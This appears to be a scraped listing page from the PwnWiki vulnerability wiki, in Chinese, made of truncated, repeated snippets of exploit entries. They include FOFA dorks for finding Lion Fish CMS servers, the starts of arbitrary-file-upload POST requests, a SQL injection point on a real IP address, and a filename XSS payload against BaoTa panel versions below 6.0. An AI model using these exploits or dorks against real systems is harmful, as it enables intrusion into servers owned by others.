狮子鱼CMS wxapp.php 任意文件上传漏洞
PWNWIK.COM , FOFA "/seller.php?s=/Public/login" Request POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: Con ...
PWNWIK.COM , FOFA "/seller.php?s=/Public/login" Request POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: Con ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , FOFA "/seller.php?s=/Public/login" Request POST /Common/ckeditor/plugins/multiimg/dialogs ...
免费、自由、人人可编辑的漏洞库--PwnWiki.com , FOFA "/seller.php?s=/Public/login" Request POST /wxapp.php?controller=Goods.doPageUpload ...
PWNWIK.COM , 注入点 http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=*** 在getdata.jsp中,直接将request对象交给 we ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 注入点 http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=*** 在getdata.jsp中 ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞影响 宝塔Linux面板<6.0 漏洞利用 在web目录下上传一个文件名为<img src=x onerror="alert(1)">的文件 宝塔后台浏览文件 ...
免费、自由、人人可编辑的漏洞库 , 漏洞影响 宝塔Linux面板<6.0 漏洞利用 在web目录下上传一个文件名为<img src=x onerror="alert(1)">的文件 宝塔后台浏览文件,触发payload G ...
PWNWIK.COM , POC POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win ...
pwnwiki.com , POC POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Wi ...
pwnwiki.com , POC POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win6 ...